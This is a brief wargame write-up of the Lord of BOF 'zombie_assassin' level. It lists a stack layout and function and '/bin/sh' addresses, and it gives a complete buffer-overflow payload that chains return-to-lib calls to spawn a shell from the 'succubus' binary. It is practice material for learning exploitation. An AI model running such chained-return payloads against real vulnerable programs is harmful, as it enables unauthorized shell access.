Wargames/Load Of BOF

LOB Redhat 6.2 - zombie_assassin

5unKn0wn 2015. 10. 30. 19:59


zomble_assassin - calling functions continuously

Stack : *addr[4] + buffer[40] + sfp[4] + ret[4]

DO : 0x80487ec
GYE : 0x80487bc
GUL : 0x804878c
YUT : 0x804875c
MO : 0x8048724

"/bin/sh" : 0xbffffa98

Payload : ./succubus `python -c 'print "A"*44 + "\xec\x87\x04\x08" + "\xbc\x87\x04\x08" + "\x8c\x87\x04\x08" + "\x5c\x87\x04\x08" + "\x24\x87\x04\x08" + "AAAA" + "\x98\xfa\xff\xbf" + "/bin/sh"'`


Using RTL Chaining